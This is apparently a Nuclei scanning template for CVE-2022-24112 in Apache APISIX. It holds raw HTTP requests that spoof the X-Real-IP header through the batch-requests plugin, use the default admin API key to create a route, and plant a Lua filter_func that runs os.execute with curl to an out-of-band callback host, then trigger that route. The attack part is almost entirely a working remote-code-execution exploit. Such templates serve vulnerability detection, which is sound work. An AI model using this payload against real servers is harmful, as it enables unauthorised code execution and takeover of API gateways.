Apache APISIX 存在改写 X-REAL-IP header （CVE-2022-24112）

id: CVE-2022-24112info:  name: Apache APISIX apisix/batch-requests RCE  description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.  author: Mr-xn  severity: critical  reference:    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112    - https://www.openwall.com/lists/oss-security/2022/02/11/3    - https://twitter.com/sirifu4k1/status/1496043663704858625    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests  tags: cve,cve2022,apache,rce,apisix  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.80    cve-id: CVE-2022-24112    cwe-id: CWE-290requests:  - raw:    - |        POST /apisix/batch-requests HTTP/1.1        Host: {{Host}}:9080        Content-Type: application/json        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close        {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{rn "name": "test", "method": ["GET"],rn "uri": "/api/test",rn "upstream":{"type":"roundrobin","nodes":{"httpbin.org:80":1}}rn,rn"filter_func": "function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end"}"}]}    - |        GET /api/test HTTP/1.1        Host: {{Host}}:9080        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close    redirects: false    matchers-condition: and    req-condition: true    matchers:      - type: dsl        dsl:          - "status_code_1 == 200"          # - "status_code_2 == 404"          - 'contains(body_1, "{{randstr}}")'          # - 'contains(body_1, ""status":200,"reason":"OK"}")'        condition: and      - type: word        part: interactsh_protocol # Confirms the HTTP Interaction        words:          - "http"